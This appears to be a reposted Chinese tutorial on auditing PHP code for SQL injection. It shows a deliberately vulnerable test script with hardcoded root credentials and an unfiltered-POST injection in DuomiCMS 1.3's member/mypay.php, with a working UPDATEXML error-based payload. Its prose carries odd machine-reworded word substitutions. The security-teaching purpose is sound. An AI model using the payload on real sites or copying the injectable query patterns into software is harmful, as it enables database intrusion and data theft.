PHP代码审计SQL注入篇
<h2 style="color: black; text-align: left; margin-bottom: 10px;">什么是SQL注入</h2>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">SQL注入攻击(SQL Injection),简<span style="color: black;">叫作</span>注入攻击,是Web<span style="color: black;">研发</span>中最<span style="color: black;">平常</span>的一种安全漏洞。<span style="color: black;">能够</span>用它来从数据库获取<span style="color: black;">敏锐</span>信息,<span style="color: black;">或</span>利用数据库的特性执行添加用户,导出文件等一系列恶意操作,<span style="color: black;">乃至</span>有可能获取数据库乃至系统用户最高权限。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">而<span style="color: black;">导致</span>SQL注入的<span style="color: black;">原由</span>是<span style="color: black;">由于</span>程序<span style="color: black;">无</span>有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL<span style="color: black;">查找</span>代码,程序在接收后错误的将攻击者的输入<span style="color: black;">做为</span><span style="color: black;">查找</span>语句的一部分执行,<span style="color: black;">引起</span>原始的<span style="color: black;">查找</span><span style="color: black;">规律</span>被改变,额外的执行了攻击者精心构造的恶意代码。</p>
<h2 style="color: black; text-align: left; margin-bottom: 10px;">SQL注入实例</h2>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">非常多</span>Web<span style="color: black;">研发</span>者<span style="color: black;">无</span><span style="color: black;">认识</span>到SQL<span style="color: black;">查找</span>是<span style="color: black;">能够</span>被篡改的,从而把SQL<span style="color: black;">查找</span>当作可信任的命令。殊不知,SQL<span style="color: black;">查找</span>是<span style="color: black;">能够</span>绕开<span style="color: black;">拜访</span><span style="color: black;">掌控</span>,从而绕过身份验证和权限<span style="color: black;">检测</span>的。更有甚者,有可能<span style="color: black;">经过</span>SQL<span style="color: black;">查找</span>去运行主机系统级的命令。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">下面将<span style="color: black;">经过</span><span style="color: black;">有些</span>真实的例子来<span style="color: black;">仔细</span>讲解SQL注入的方式。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> <img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNceyp2pJJHQa5m3QFrv1VSTMII8qOicmclxaVic99FSTJskl5k0IH3aDg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">测试代码如下:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><?</span><span style="color: black;">php</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$uid</span><span style="color: black;">=</span><span style="color: black;">$_GET</span><span style="color: black;">[</span><span style="color: black;">id</span><span style="color: black;">]; </span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$sql</span><span style="color: black;">=</span><span style="color: black;">"SELECT * FROM userinfo where id=$uid"</span><span style="color: black;">;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$conn</span><span style="color: black;">=</span><span style="color: black;">mysql_connect </span><span style="color: black;">(</span><span style="color: black;">localhost</span><span style="color: black;">,</span><span style="color: black;">root</span><span style="color: black;">,</span><span style="color: black;">root</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">mysql_select_db</span><span style="color: black;">(</span><span style="color: black;">"sql"</span><span style="color: black;">,</span><span style="color: black;">$conn</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$result</span><span style="color: black;">=</span><span style="color: black;">mysql_query</span><span style="color: black;">(</span><span style="color: black;">$sql</span><span style="color: black;">,</span><span style="color: black;">$conn</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">print_r</span><span style="color: black;">(</span><span style="color: black;">当前SQL语句: </span><span style="color: black;">.</span><span style="color: black;">$sql</span><span style="color: black;">.</span><span style="color: black;"> 结果: </span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">print_r</span><span style="color: black;">(</span><span style="color: black;">mysql_fetch_row</span><span style="color: black;">(</span><span style="color: black;">$result</span><span style="color: black;">));</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">?></span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltN25IpOwPPCJBd3DylSPMP9ap64UTYa8ytaRDNfgPAX9JpiaoSzBqP4uQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">首要</span><span style="color: black;">咱们</span>看一下代码:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$uid</span><span style="color: black;">=</span><span style="color: black;">$_GET</span><span style="color: black;">[</span><span style="color: black;">id</span><span style="color: black;">]; //获取GET值</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$sql</span><span style="color: black;">=</span><span style="color: black;">"SELECT * FROM userinfo where id=$uid"</span><span style="color: black;">;</span><span style="color: black;">//执行SQL语句</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$conn</span><span style="color: black;">=</span><span style="color: black;">mysql_connect </span><span style="color: black;">(</span><span style="color: black;">localhost</span><span style="color: black;">,</span><span style="color: black;">root</span><span style="color: black;">,</span><span style="color: black;">root</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">mysql_select_db</span><span style="color: black;">(</span><span style="color: black;">"sql"</span><span style="color: black;">,</span><span style="color: black;">$conn</span><span style="color: black;">);</span><span style="color: black;">//数据库配配置</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">$result</span><span style="color: black;">=</span><span style="color: black;">mysql_query</span><span style="color: black;">(</span><span style="color: black;">$sql</span><span style="color: black;">,</span><span style="color: black;">$conn</span><span style="color: black;">);</span><span style="color: black;">//进行<span style="color: black;">查找</span>SQL语句</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">print_r</span><span style="color: black;">(</span><span style="color: black;">当前SQL语句: </span><span style="color: black;">.</span><span style="color: black;">$sql</span><span style="color: black;">.</span><span style="color: black;"> 结果: </span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">print_r</span><span style="color: black;">(</span><span style="color: black;">mysql_fetch_row</span><span style="color: black;">(</span><span style="color: black;">$result</span><span style="color: black;">));</span><span style="color: black;">//进行打印输出<span style="color: black;">无</span>任何的过滤<span style="color: black;">因此</span>利用简单的SQL注入语句就<span style="color: black;">能够</span>直接<span style="color: black;">查找</span><span style="color: black;">关联</span>需要的信息。</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNMd9tsRQjPXfPZuPprLiaszWIWgG47NeOT4vndZNeDryOFmGClFf8ib5g/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">从截图<span style="color: black;">能够</span>看出<span style="color: black;">本来</span>的SQL语句已被注入更改,<span style="color: black;">运用</span>了UNION<span style="color: black;">查找</span>到当前用户。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">另一</span>一个多米CMS最新版1.3版本注入实例。</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">漏洞文件member/mypay.php(14-40行)</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">if</span><span style="color: black;">(</span><span style="color: black;">empty</span><span style="color: black;">(</span><span style="color: black;">$_SESSION</span><span style="color: black;">[</span><span style="color: black;">duomi_user_id</span><span style="color: black;">])){</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">showMsg</span><span style="color: black;">(</span><span style="color: black;">"请先登录"</span><span style="color: black;">,</span><span style="color: black;">"login.php"</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">exit</span><span style="color: black;">();</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">}</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">elseif</span><span style="color: black;">(</span><span style="color: black;">$dm</span><span style="color: black;">==</span><span style="color: black;">mypay</span><span style="color: black;">){</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $key</span><span style="color: black;">=</span><span style="color: black;">$_POST</span><span style="color: black;">[</span><span style="color: black;">cardkey</span><span style="color: black;">];</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">if</span><span style="color: black;">(</span><span style="color: black;">$key</span><span style="color: black;">==</span><span style="color: black;">""</span><span style="color: black;">){</span><span style="color: black;">showMsg</span><span style="color: black;">(</span><span style="color: black;">"请输入充值卡号"</span><span style="color: black;">,</span><span style="color: black;">"-1"</span><span style="color: black;">);</span><span style="color: black;">exit</span><span style="color: black;">;}</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $pwd</span><span style="color: black;">=</span><span style="color: black;">$_POST</span><span style="color: black;">[</span><span style="color: black;">cardpwd</span><span style="color: black;">];</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">if</span><span style="color: black;">(</span><span style="color: black;">$pwd</span><span style="color: black;">==</span><span style="color: black;">""</span><span style="color: black;">){</span><span style="color: black;">showMsg</span><span style="color: black;">(</span><span style="color: black;">"请输入充值卡<span style="color: black;">秘码</span>"</span><span style="color: black;">,</span><span style="color: black;">"-1"</span><span style="color: black;">);</span><span style="color: black;">exit</span><span style="color: black;">;}</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $sqlt</span><span style="color: black;">=</span><span style="color: black;">"SELECT * FROM duomi_card where ckey=$key"</span><span style="color: black;">;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $sqlt</span><span style="color: black;">=</span><span style="color: black;">"SELECT * FROM duomi_card where cpwd=$pwd"</span><span style="color: black;">;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $row1 </span><span style="color: black;">=</span><span style="color: black;"> $dsql</span><span style="color: black;">-></span><span style="color: black;">GetOne</span><span style="color: black;">(</span><span style="color: black;">$sqlt</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">if</span><span style="color: black;">(!</span><span style="color: black;">is_array</span><span style="color: black;">(</span><span style="color: black;">$row1</span><span style="color: black;">)</span><span style="color: black;"> OR $row1</span><span style="color: black;">[</span><span style="color: black;">status</span><span style="color: black;">]<></span><span style="color: black;">0</span><span style="color: black;">){</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> showMsg</span><span style="color: black;">(</span><span style="color: black;">"充值卡信息有误"</span><span style="color: black;">,</span><span style="color: black;">"-1"</span><span style="color: black;">);</span><span style="color: black;">exit</span><span style="color: black;">;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">}</span><span style="color: black;">else</span><span style="color: black;">{</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $uname</span><span style="color: black;">=</span><span style="color: black;">$_SESSION</span><span style="color: black;">[</span><span style="color: black;">duomi_user_name</span><span style="color: black;">];</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $points</span><span style="color: black;">=</span><span style="color: black;">$row1</span><span style="color: black;">[</span><span style="color: black;">climit</span><span style="color: black;">];</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $dsql</span><span style="color: black;">-></span><span style="color: black;">executeNoneQuery</span><span style="color: black;">(</span><span style="color: black;">"UPDATE duomi_card SET usetime=NOW(),uname=$uname,status=1 WHERE ckey=$key"</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $dsql</span><span style="color: black;">-></span><span style="color: black;">executeNoneQuery</span><span style="color: black;">(</span><span style="color: black;">"UPDATE duomi_card SET usetime=NOW(),uname=$uname,status=1 WHERE cpwd=$pwd"</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> $dsql</span><span style="color: black;">-></span><span style="color: black;">executeNoneQuery</span><span style="color: black;">(</span><span style="color: black;">"UPDATE duomi_member SET points=points+$points WHERE username=$uname"</span><span style="color: black;">);</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"> showMsg</span><span style="color: black;">(</span><span style="color: black;">"恭喜!充值成功!"</span><span style="color: black;">,</span><span style="color: black;">"mypay.php"</span><span style="color: black;">);</span><span style="color: black;">exit</span><span style="color: black;">;</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">}</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">}</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">else</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">{</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">此处的”cardpwd”变量<span style="color: black;">无</span>进行过滤就以POST提交方式传入了数据库<span style="color: black;">导致</span>注入。 构造POC如下(<span style="color: black;">重视</span>此处需要注册用户并且登陆详情请看该文件1-17行):</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">http</span><span style="color: black;">:</span><span style="color: black;">//localhost/member/mypay.php?dm=mypay</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">POST</span><span style="color: black;">:</span><span style="color: black;">cardpwd</span><span style="color: black;">=-</span><span style="color: black;">1</span><span style="color: black;"> AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and </span><span style="color: black;">1</span><span style="color: black;">=</span><span style="color: black;">1</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu014RKwnciaYX7heuh4VOqltNC1P6jiaN5OOCm04sZ8ibvAM1walYrBTImqaqiavcB4MTL40twjBfHg8bA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
页:
[1]